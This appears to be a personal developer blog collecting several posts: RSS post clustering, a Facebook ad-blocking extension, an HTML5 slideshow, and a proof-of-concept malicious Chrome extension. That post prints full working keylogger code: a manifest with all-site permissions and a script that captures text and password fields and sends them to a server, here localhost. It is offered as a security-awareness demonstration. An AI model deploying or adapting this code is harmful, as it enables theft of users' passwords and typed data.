Hierarchical clustering of blog posts fetched through RSS Feed

Today I tried to implement a simple webapp that fetches RSS feeds from a given URL, reads their content, and uses hierarchical clustering to group the posts into rough categories by content similarity.

Actually, the implementation is really poor, and I’m not even sure it works. Anyway, I had wanted to try some kind of text classifier for a long time, and here we are. It extracts the text from the RSS feed, indexes the words in it, and tries to use them as features for the algorithm. Short posts generally mean bad results, especially without any kind of generalization of the features (stemming is probably the right word here). In fact, the results are hard to interpret, and I guess they’re close to random.
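To make the "index the words and use them as features" step concrete, here is a minimal sketch of a bag-of-words encoding. It is not the code from the webapp: the function names `tokenize` and `toFeatureVectors` are made up for illustration, and the tokenizer only keeps ASCII letters and digits.

```javascript
// Lowercase the text and split it into word tokens (ASCII letters and digits only).
function tokenize(text) {
  return text.toLowerCase().match(/[a-z0-9]+/g) || [];
}

// Build a shared vocabulary and one word-count vector per post.
function toFeatureVectors(posts) {
  const tokenized = posts.map(tokenize);
  const vocabulary = [...new Set(tokenized.flat())].sort();
  const index = new Map(vocabulary.map((word, i) => [word, i]));
  const vectors = tokenized.map((tokens) => {
    const vector = new Array(vocabulary.length).fill(0);
    for (const token of tokens) vector[index.get(token)] += 1;
    return vector;
  });
  return { vocabulary, vectors };
}

// Two tiny example "posts" (invented for this sketch).
const { vocabulary, vectors } = toFeatureVectors([
  "Cats chase mice",
  "Dogs chase cats",
]);
console.log(vocabulary); // [ 'cats', 'chase', 'dogs', 'mice' ]
console.log(vectors);    // [ [ 1, 1, 0, 1 ], [ 1, 1, 1, 0 ] ]
```

With short posts most entries of each vector are zero, which is probably one reason the clusters look random.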

Anyway, here’s a list of what I (sort of) learned along the way:

  • what hierarchical clustering is (not how it works, though)
  • d3.js graph library basics (very basic basics)
  • how to use NetBeans to develop webapps

That’s not so bad for a spare afternoon and evening.

I didn’t implement the algorithm myself; I used a library from GitHub, clusterfck.
Oh, and I also used the jFeed jQuery plugin to parse the RSS, slightly modified so that it fetches the content of the entries and doesn’t crash while trying to detect IE.
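For reference, the general idea behind agglomerative hierarchical clustering can be sketched in a few lines. This is not clusterfck’s code or API, just a naive illustration that assumes Euclidean distance and average linkage; the names `euclidean`, `averageLinkage` and `hierarchicalCluster` are made up here.

```javascript
// Euclidean distance between two equal-length numeric vectors.
function euclidean(a, b) {
  return Math.sqrt(a.reduce((sum, x, i) => sum + (x - b[i]) ** 2, 0));
}

// Average-linkage distance: mean distance over all cross-cluster pairs.
function averageLinkage(c1, c2) {
  let total = 0;
  for (const a of c1.points) for (const b of c2.points) total += euclidean(a, b);
  return total / (c1.points.length * c2.points.length);
}

// Repeatedly merge the two closest clusters until a single tree remains.
function hierarchicalCluster(vectors) {
  let clusters = vectors.map((v) => ({ points: [v], value: v }));
  while (clusters.length > 1) {
    let best = { i: 0, j: 1, d: Infinity };
    for (let i = 0; i < clusters.length; i++) {
      for (let j = i + 1; j < clusters.length; j++) {
        const d = averageLinkage(clusters[i], clusters[j]);
        if (d < best.d) best = { i, j, d };
      }
    }
    const left = clusters[best.i];
    const right = clusters[best.j];
    const merged = { points: left.points.concat(right.points), left, right };
    clusters = clusters.filter((_, k) => k !== best.i && k !== best.j);
    clusters.push(merged);
  }
  return clusters[0];
}

// The two nearby points are merged first, then joined with the far one.
const tree = hierarchicalCluster([[0, 0], [0, 1], [10, 10]]);
console.log(tree.points.length); // 3
```

The result is a binary tree: leaves carry a `value`, inner nodes carry `left` and `right`, which is the kind of structure a dendrogram is drawn from.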

Here’s the link.

A thought (and proof-of-concept) about malicious Chrome extensions

OK, today I made a simple Chrome extension and suddenly got very excited about it (yeah, I know, almost every blog post I write starts like this). Then, reading about what extensions can do, I learned that they are not limited by the same-origin policy.

This means that an AJAX request made by an extension can go to a server on a different domain from the current page. This can be harmful in several ways. The first that comes to mind is a simple keylogger extension that logs everything you type (passwords included) and sends it to a malicious server.
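As a reminder of what the same-origin policy compares, here is a small sketch using the standard `URL` class. The helper name `isSameOrigin` and the example URLs are made up for illustration.

```javascript
// Two URLs share an origin when scheme, host, and port all match.
function isSameOrigin(urlA, urlB) {
  return new URL(urlA).origin === new URL(urlB).origin;
}

// Same site, different path: same origin.
console.log(isSameOrigin("https://example.com/login", "https://example.com/api"));
// Different host: a normal page script would be restricted here.
console.log(isSameOrigin("https://example.com/login", "https://collector.example.net/"));
```

A regular script on the page is restricted when the two origins differ; an extension that has been granted access to those hosts is not.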

So I built that keylogger, just to understand how difficult it is and what kind of warning the Chrome Web Store shows when you decide to add it to your browser.

Making the malicious extension

Actually, since you can inject JavaScript into pages, making the keylogger extension is straightforward: you just have to write two files, a manifest and the script:

manifest.json:

{
  "manifest_version": 2,
  "name": "KeyLogger",
  "description": "This extension logs everything you type.",
  "version": "1.0.1",

  "permissions": [
    "http://*/*", "https://*/*"
  ],

  "content_scripts": [{
    "matches": ["http://*/*", "https://*/*"],
    "js": ["script.js"]
  }]
}

script.js:

var xmlhttp = new XMLHttpRequest();
console.log('Starting keylogger..')

// Runs every 2 seconds, so fields added after page load are covered too.
setInterval(function() {
  var inputs = document.getElementsByTagName('input')
  var textAreas = document.getElementsByTagName('textarea')

  // Send the current value of the field that fired the event.
  var myLog = function(event) {
    var what = encodeURIComponent(event.srcElement.value)

    console.log("Logged: " + what)
    console.log("Sending data to remote server..")
    xmlhttp.open("GET", "http://localhost/?" + what, true);
    xmlhttp.send();
  }

  // Wrap any handler already set on the field so that it still runs.
  var getHandler = function(previousHandler, obj) {
    return function(e) {
      myLog(e);
      if (previousHandler) previousHandler(e);
    }
  }

  for (var i = 0; i < inputs.length; i++) {
    if (inputs[i].getAttribute('type') == 'text' || inputs[i].getAttribute('type') == 'password') {
      inputs[i].onblur = getHandler(inputs[i].onblur, inputs[i])
    }
  }

  for (var i = 0; i < textAreas.length; i++) {
    textAreas[i].onblur = getHandler(textAreas[i].onblur, textAreas[i])
  }
}, 2000)

The script is a simple implementation that sends, via AJAX requests, all the text you type into text boxes, password fields included. In this simple proof of concept it sends everything to localhost.

I tried it, and it works.

Installing the extension

I published it to the Chrome Web Store and tried to install it to see what kind of warning would show up. All I got was this:

[Screenshot: the permission warning shown for the keylogger extension]

...which is not so unusual for, say, an ad-blocking extension:

[Screenshot: the permissions requested by an ad-blocking extension]

So this blog post is here to remind you to use only trusted Chrome extensions. It’s very easy to steal your data with a malicious Chrome extension, it’s easy to hide malicious code in an apparently innocent extension, and once you have installed it, it’s easy to forget about it.
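One way to act on this is to look at which sites an extension can touch before trusting it. Below is a rough sketch of such a check on a parsed manifest.json. The function name `findBroadHostAccess` and the list of "broad" patterns are my own assumptions and are certainly not exhaustive.

```javascript
// Patterns that grant access to every site (illustrative, not exhaustive).
const BROAD_PATTERNS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

// Collect every broad pattern found in permissions or content script matches.
function findBroadHostAccess(manifest) {
  const fromPermissions = manifest.permissions || [];
  const fromScripts = (manifest.content_scripts || []).flatMap((cs) => cs.matches || []);
  const found = [...fromPermissions, ...fromScripts].filter((p) => BROAD_PATTERNS.has(p));
  return [...new Set(found)];
}

// A manifest shaped like the proof of concept in this post.
const manifest = {
  manifest_version: 2,
  permissions: ["http://*/*", "https://*/*"],
  content_scripts: [{ matches: ["http://*/*", "https://*/*"], js: ["script.js"] }],
};
console.log(findBroadHostAccess(manifest)); // [ 'http://*/*', 'https://*/*' ]
```

A non-empty result does not mean the extension is malicious (ad blockers legitimately need this access), only that it is able to read what you type on any site.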

Please don’t do bad things with my code and/or ideas.

Chrome Extension to block sponsored posts on the Facebook timeline

That’s what I did today. I wanted to find out how difficult it actually is to make a Chrome extension that injects some JavaScript into a page. After a discussion with some friends about website advertising I got the idea and made this simple extension.
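The injected script for this kind of extension can be very small. What follows is only a sketch of the general idea, not the published extension’s code: the `[role='article']` selector and the "Sponsored" marker text are hypothetical, and the real page markup may well differ.

```javascript
// Hide every element whose text contains the marker; return how many were hidden.
function hideSponsored(elements, marker = "Sponsored") {
  let hidden = 0;
  for (const el of elements) {
    if (el.textContent.includes(marker)) {
      el.style.display = "none";
      hidden += 1;
    }
  }
  return hidden;
}

// In a content script this would run against the page (hypothetical selector).
if (typeof document !== "undefined") {
  hideSponsored(document.querySelectorAll("[role='article']"));
}
```

Since a timeline loads more posts as you scroll, a real content script would have to repeat the check whenever new posts appear.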

As part of the test, I registered a Chrome Web Store developer account and published the extension. I’ll post the link here as soon as the extension is accepted.

Update: here’s the link

An engaging design with HTML5

This little project consists of an HTML5 page and script for making “rich presentations”. The idea is to create a design that easily takes advantage of what HTML5 offers.

In this example I decided to implement a slideshow of photos enhanced with background music, which helps create a very pleasing experience for the user. You could also fully control the user experience by setting timers to advance the pages, or by preventing people from skipping pages by clicking, and so on. Unfortunately, the code is still very messy, but I’m planning to organize it better and maybe share it in a future update to this post.
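The timer and "no skipping" ideas can be sketched as a tiny state machine that is independent of the page. This is not the project’s code: `createSlideshow`, its `allowSkip` option and the file names are invented for this example, and `render` stands for whatever actually puts a photo on screen.

```javascript
// Slideshow state machine; `render` is called with the slide to display.
function createSlideshow(slides, render, { allowSkip = true } = {}) {
  let current = 0;
  render(slides[current]);
  const advance = () => {
    if (current < slides.length - 1) render(slides[++current]);
    return current;
  };
  return {
    // Called by a timer: always advances (until the last slide).
    tick: advance,
    // Called on a user click: ignored when skipping is disabled.
    click: () => (allowSkip ? advance() : current),
    position: () => current,
  };
}

// Record what would be shown instead of touching a real page.
const shown = [];
const show = createSlideshow(["a.jpg", "b.jpg", "c.jpg"], (s) => shown.push(s), { allowSkip: false });
show.click(); // ignored: skipping is disabled
show.tick();  // the timer moves on to the second photo
console.log(shown); // [ 'a.jpg', 'b.jpg' ]
```

In a page, `tick` would be driven by something like `setInterval(show.tick, 5000)` and `click` by a click listener on the slide.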

The project was created to try out some of the power of HTML5, including the audio tag and the fullscreen option (which I get through this jQuery plugin).

I didn’t try it (I run Linux on my PCs), but I wouldn’t be surprised to discover that IE cannot render the page correctly. It was tested on Firefox and Chromium, with Firefox performing slightly better.

Here’s the link to the example, which uses photos taken by a friend of mine, Stefano Collovati, whom I want to thank publicly here for his help in designing the prototype.

All the photos are the property of Stefano Collovati; contact him if you want further information about using or sharing them.